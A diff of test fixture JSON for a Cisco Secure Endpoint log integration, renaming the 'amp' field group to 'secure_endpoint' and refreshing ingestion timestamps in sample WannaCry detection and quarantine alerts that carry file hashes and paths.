-                "ingested": "2021-09-13T18:07:55.452586210Z",
+                "ingested": "2021-09-27T00:42:26.818527282Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2109,7 +2109,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2186,7 +2186,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452588141Z",
+                "ingested": "2021-09-27T00:42:26.818529012Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2197,7 +2197,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2259,7 +2259,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452590049Z",
+                "ingested": "2021-09-27T00:42:26.818530749Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2269,7 +2269,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2334,7 +2334,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452592053Z",
+                "ingested": "2021-09-27T00:42:26.818532472Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2344,7 +2344,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2409,7 +2409,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452593968Z",
+                "ingested": "2021-09-27T00:42:26.818534211Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2419,7 +2419,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2496,7 +2496,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452595861Z",
+                "ingested": "2021-09-27T00:42:26.818535942Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2507,7 +2507,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2569,7 +2569,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452597787Z",
+                "ingested": "2021-09-27T00:42:26.818537665Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2579,7 +2579,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2640,7 +2640,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452599647Z",
+                "ingested": "2021-09-27T00:42:26.818539384Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2650,7 +2650,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2723,7 +2723,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452601659Z",
+                "ingested": "2021-09-27T00:42:26.818541207Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2734,7 +2734,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2812,7 +2812,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452603555Z",
+                "ingested": "2021-09-27T00:42:26.818542950Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2823,7 +2823,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2885,7 +2885,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452605458Z",
+                "ingested": "2021-09-27T00:42:26.818544687Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2895,7 +2895,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2972,7 +2972,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452607341Z",
+                "ingested": "2021-09-27T00:42:26.818546406Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2983,7 +2983,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3061,7 +3061,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452609262Z",
+                "ingested": "2021-09-27T00:42:26.818548148Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3072,7 +3072,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -3150,7 +3150,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452611169Z",
+                "ingested": "2021-09-27T00:42:26.818549864Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3161,7 +3161,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3248,7 +3248,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452613080Z",
+                "ingested": "2021-09-27T00:42:26.818551604Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3259,7 +3259,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -3346,7 +3346,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452614986Z",
